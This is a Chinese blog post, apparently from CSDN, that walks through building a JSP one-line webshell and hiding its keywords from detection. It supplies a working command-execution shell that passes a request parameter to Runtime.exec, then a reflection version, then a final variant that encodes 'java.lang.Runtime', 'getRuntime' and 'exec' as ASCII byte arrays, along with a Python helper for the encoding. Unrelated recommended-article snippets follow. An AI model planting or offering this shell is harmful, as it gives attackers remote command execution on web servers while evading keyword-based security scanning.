简单的jsp无关键字一句话

已于 2023-05-17 23:29:31 修改
阅读量582 收藏
点赞数
文章标签: java web安全
于 2022-05-16 23:37:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40131760/article/details/124810798
版权

通过ascii码与字符之间的转换,加上通过反射加载类,实现无关键字一句话

py脚本script_str2ascii

首先写一个简单的py脚本,转换命令为byte数组

cmd=input("input code")
arr=[]
for char in cmd:
    arr.append(ord(char))
print(arr)
开始

接下来找一个简单的小马,进行改造

<%
    String cmd = request.getParameter("cmd");
    StringBuffer res = new StringBuffer();
    //加一个系统的判断
    String os = System.getProperty("os.name");
    boolean isWin = false;
    BufferedReader bufferedReader;
    if (os != null && os.toLowerCase().startsWith("windows")) {
        isWin = true;
    }
    try {
        if (isWin == false) {
            bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
        } else {
            bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("cmd /C " + cmd).getInputStream()));
        }

        String len;
        while ((len = bufferedReader.readLine()) != null) {
            res.append(len + "\n");
        }

    } catch (Exception e) {
        res.append(e.getMessage());

    }
   out.print("<pre>" + res.toString() + "</pre>");
%>
通过反射改变获取类并执行的方式

主要目的是将runtime相关的类和函数通过反射进行修改

<%Class<?> aClass = Class.forName("java.lang.Runtime");//这个forName加载类的时候会执行类内的静态代码块
    Method method = aClass.getMethod("getRuntime");
    Object o = method.invoke(null);//这里获取到runtime类
    Method method1 = aClass.getMethod("exec", String.class);
    method1.invoke(o,"calc");
%>

有两点值得说一下
1.使用forName加载类会执行静态代码块,由于Runtime类是单例设计模式,所以执行静态代码块之后getRuntime方法才能拿到Runtime类的实例
2.method.invoke(null)可以传递null的原因是该方法为静态方法,可以这样理解---------静态方法会给所有实例共享,所以不需要传递哪个具体的实例进去,于是传递个null就行了

通过反射加载runtime类的方式可行,并且成功弹出了计算器

接下来通过ascii数组,替换其中比较敏感的字符串

上面那个小马里面别的不关键的东西懒得写了…

这里可以使用byte数组,原因是当前涉及到的字符串中的所有字符ascii码均在127以下

加入byte数组

通过byte数组修饰以下关键字

<%
    byte[] a={106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101};
    Class<?> aClass = Class.forName(new String(a));//这个forName加载类的时候会执行类内的静态代码块
    byte[] b={103, 101, 116, 82, 117, 110, 116, 105, 109, 101};
    Method method = aClass.getMethod(new String(b));
    Object o = method.invoke(null);//这里获取到runtime类
    byte[] c={101, 120, 101, 99};
    Method method1 = aClass.getMethod(new String(c), String.class);
    method1.invoke(o,request.getParameter("haha"));
%>
blueSatchel
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JSP以及相关使用
weixin_47543906的博客
12-04 2378
JSP(全称:Java Server Pages):Java 服务端页面。==是一种动态的网页技术,其中既可以定义 HTML、JS、CSS等静态内容,还可以定义 Java代码的动态内容,也就是 JSP = HTML + Java。 之前学到了Servlet的返回html页面,我们了解到这种只使用Servlet的方式太繁琐了,所以加入JSP,改为使用Servlet+JSP的方式。 JSP 作用:简化开发,避免了在Servlet中直接输出HTML标签。
jsp页面中点击编辑按钮,显示input边框,可编辑,点击保存按钮,输入框消失,不可编辑,并将文本框中的内容保存到数据库中
爱学习的大雄的博客
12-07 3038
寻找的资料 一、 默认readonly不允许编辑。点击编辑的时候加上边框样式,去掉readonly属性 <style>.readonly input{border:none}</style> <div id="dvInput" class="readonly"> text1:<input type="text" readonly value="text1" /><br /> text2:<input type="text" readon
javascript 单击按钮出现文本内容
Medlen
09-23 2万+
单击按钮出现文本内容 function myfunction() { var x="Have fun!" document.getElementById("demo").innerHTML=x; } 点击这里
JSP页面打印输出,两种方法。out、《%= ,哪种输出方式更好?
热门推荐
immense的博客
06-18 5万+
提问:JSP中使用哪种输出方式更好? 已经学习过使用 out.println() 和 &lt;%=%&gt;输出的形式,那么在开发中使用哪种输出方式更好呢? 回答: 在JSP的开发中,实际上就是在HTML中加入了一些控制及输出的语句,所以在输出时为了使HTML代码和Java代码相分离,最好的做法就是只输出JSP产生的变量,那么这时使用表达式输出就比使用 out.println()更加方便。...
JSP——输出显示
编程火箭车(Coding Rocket)专注编程领域
05-06 7871
1.out对象输出显示 out对象是JSP提供的一个内置对象,它的作用就是向客户端输出数据,out对象最常用的方法: print() :向页面输出显示 println() :向页面输出显示,在显示末尾添加换行 例如: &lt;body&gt; &lt;%-- out对象输出显示 --%&gt; &lt;...
bbs.rar_bbs jsp
09-24
【描述】:“这是一个bbs,应用jsp简单实现了他的功能,虽简单,实用性很好” 这句话告诉我们,这个BBS系统使用了JavaServer Pages(JSP)技术进行开发,它是一个轻量级的Web应用程序框架,用于动态生成网页内容。...
利用jsp简单网页程序--人肉搜索系统
11-20
在"利用jsp写的简单的网页小程序"这句话中,我们可以理解到,整个系统的后台是由JSP脚本语言驱动的,它负责处理HTTP请求,执行服务器端的逻辑,并生成动态响应。 用户登录与注销是任何Web应用的基础。在JSP中,这...
WebShell技术分享.pptx
06-10
WebShell的功能可广泛分为全功能型、文件管理型、命令执行型、上传型和一句话型等。全功能型WebShell能执行各种操作;文件管理型专注于文件操作;命令执行型允许运行操作系统命令;上传型用于上传更大的恶意文件;而...
超级有影响力霸气的Java面试题大全文档
07-18
但通常情况下,由于Java Bean是被容器所创建(如Tomcat)的,所以Java Bean应具有一个无参的构造器,另外,通常Java Bean还要实现Serializable接口用于实现Bean的持久性。Java Bean实际上相当于微软COM模型中的本地...
java面试宝典
02-28
18、两个对象值相同(x.equals(y) == true),但却可有不同的hash code,这句话对不对? 9 19、是否可以继承String 类? 9 20、以下二条语句返回值为true 的有: 10 21、当一个对象被当作参数传递到一个方法后,此方法可...
javascript实现点击后变换按钮显示文字的方法
10-24
主要介绍了javascript实现点击后变换按钮显示文字的方法,可实现显示一些按钮如果点击了,按钮文本变为“点了”,其他按钮文本变为“没点”的效果,非常具有实用价值,需要的朋友可以参考下
JSP中使用哪种输出方式更好?
C & JAVA专栏
10-20 1万+
提问:JSP中使用哪种输出方式更好? 已经学习过使用 out.println() 和 输出的形式,那么在开发中使用哪种输出方式更好呢? 回答: 在JSP的开发中,实际上就是在HTML中加入了一些控制及输出的语句,所以在输出时为了使HTML代码和Java代码相分离,最好的做法就是只输出JSP产生的变量,那么这时使用表达式输出就比使用 out.println()更加方便。
使用JSP实现输出
weixin_30896511的博客
05-13 1199
一、在JSP页面添加java代码,实现输出java代码写在<% %>中。 代码示例1: <body> <!-- HTML注释 --> <%-- JSP注释 --%> <% //java注释 out.println("<h5>你好,世界<h5><br>"); out.print("你好,\...
JSP篇】——2.第一个简易的JSP代码:java控制输出1-100之和,say hello并写一个简单的表格
小火龙的博客
03-19 1万+
工程说明:该工程的任务是了解如何在jsp中文件中工作在&lt;%与%&gt;中写入java代码,实现1-100求和在网页标签中输出一句话和一个表格运行效果:点我下载步骤:---------第一个JSP文件----------1.创建一个jsp文件,该文件在WebRoot下,命名为GreetingJsp.jsp2.打开文件,在&lt;% %&gt;中输入java代码:求1-100之和并输出3.在&l...
简单jsp实现输出当前时间
lzp0817的博客
12-13 6881
实现输出当前时间 <%@page import="java.util.Date"%> <%@page import="java.text.SimpleDateFormat"%> <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <!DOCTYPE html> <html> <head> <meta c
使用jsp实现输出
weixin_45545460的博客
09-04 2835
输出的两种方式: <%out.print();%> <%out.println();> 示例: <head> <meta charset="UTF-8"> <title>这是我的第一个jsp页面</title> </head> <body> <h1><a href="/web0...
jsp页面中输出
cs小院
05-21 2358
今天,我在中写输出语句,然而发现网页中并没有输出,后来发现原来我把out.pirntln()给写成System.out.pirntln()了。去掉System就好了,但是System.out.pirntln()的内容输出到哪里了呢?往下一看,原来在控制台上输出了。
怎么使用bert搜索一句话关键字
最新发布
08-16
### 回答1: 你可以使用 BERT 模型预测一句话中最可能出现的关键字。首先,你需要准备好训练好的 BERT 模型和输入数据,然后使用如下步骤进行搜索: 1. 将输入数据转换成 BERT 能够处理的格式,例如将文本转换成 BERT 输入所需的 ID 序列。 2. 使用 BERT 模型对输入数据进行编码,得到输入句子的表示向量。 3. 使用表示向量作为输入,调用搜索引擎的 API,获取搜索结果。 4. 对搜索结果进行处理,提取出关键字。 这是一个大致的流程,具体实现过程可能会有所不同。希望这对你有帮助。 ### 回答2: 使用BERT搜索一句话关键字有以下几个步骤: 1. 数据预处理:将待搜索的句子进行分词,并添加特殊的标记符号,如[CLS]和[SEP]。同时,将句子转化为数字序列,以便输入BERT模型。 2. 输入编码:将预处理后的句子输入BERT模型,得到句子中每个词的词向量表示。 3. 关键字提取:通过计算句子中每个词的向量表示与一个预训练好的关键字向量之间的相似度,来确定关键字。 4. 相似度计算:常用的相似度计算方法包括余弦相似度和欧式距离。可以选择一个适合自己任务的相似度计算方法。 5. 关键字排序:根据相似度的大小,对关键字进行排序,得到搜索结果。也可以设置一个阈值,只保留相似度高于阈值的关键字。 以上是使用BERT搜索一句话关键字的基本步骤。值得注意的是,BERT模型需要大量的计算资源和较长的训练时间,在使用之前需要先进行预训练,并在特定任务上进行微调。此外,还可以结合其他算法和技术进行优化,以提升搜索的准确性和效率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值